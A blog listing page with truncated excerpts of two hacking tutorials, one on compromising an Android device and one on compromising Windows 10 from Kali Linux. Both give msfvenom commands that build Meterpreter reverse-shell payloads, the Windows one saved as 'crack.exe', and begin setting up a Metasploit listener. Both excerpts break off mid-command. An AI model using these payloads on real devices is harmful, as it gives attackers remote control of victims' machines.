Posts

Exploiting Android using Kali Linux

Image
  Hello everyone, this blog is related to exploiting Android system using Kali Linux. So, basically we need two operating systems, First one is kali(attacker) and second one is Android(victim). This Practical works when both of the machines are in same network. So. I have installed Kali-linux in Virtualbox and I am using Genymotion for Android. And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network, This also works if you have host machine kali and on other side you have Android Device with you. You can also install kali on Virtualbox and set it to NAT network. For surety u can ping the Android Device machine from Kali to check that the machines are on same network or not. Practical Starts Here -  1. go to kali terminal and type the following command.  type your kali ip instead of  170.9.210.105 msfvenom –p android/meterpreter/rev...

Exploit Windows 10

Image
Exploiting Windows 10 (latest update) using  metasploit (in KALI):  Cyberator Introduction: The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.  This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box. Step 1: - Open terminal in Kali and type the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe Step 2: -  Open terminal in Kali and type the following commands     msfdb init    msfconsole    use exploit/multi/handler    set payload windows/x64/meterpreter/reverse...